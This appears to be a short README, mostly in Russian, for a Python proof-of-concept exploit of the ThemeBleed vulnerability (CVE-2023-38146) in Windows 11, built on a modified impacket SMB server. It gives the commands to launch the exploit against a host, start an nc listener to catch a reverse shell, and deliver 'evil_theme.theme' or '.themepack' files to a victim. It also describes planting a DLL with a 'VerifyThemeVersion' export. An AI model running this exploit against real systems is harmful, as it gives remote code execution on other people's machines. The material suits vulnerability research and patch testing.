
使用impacket用Python编写的ThemeBleed Windows 11 CVE-2023-38146的PoC。https://jnns.de/posts/cve-2023-38146-poc/
Сильно вдохновлено https://github.com/gabe-k/themebleed, который работает только на Windows (именно поэтому я решил написать это).
Использован модифицированный код из impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
Полезные материалы: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
Статья в блоге: https://jnns.de/posts/cve-2023-38146-poc/
Установите зависимости и запустите приложение:
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# запустите nc слушатель в другой оболочке
rlwrap -cAr nc -lvnp 4711
Используйте файл "evil_theme.theme" или "evil_theme.themepack" на уязвимой машине.
Профит!
Поместите DLL с экспортируемой функцией "VerifyThemeVersion" в папку "./td/" с именем "Aero.msstyles_vrf_evil.dll". Пример DLL можно найти через Google или использовать мой пример .
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# запустите nc слушатель в другой оболочке
rlwrap -cAr nc -lvnp 4711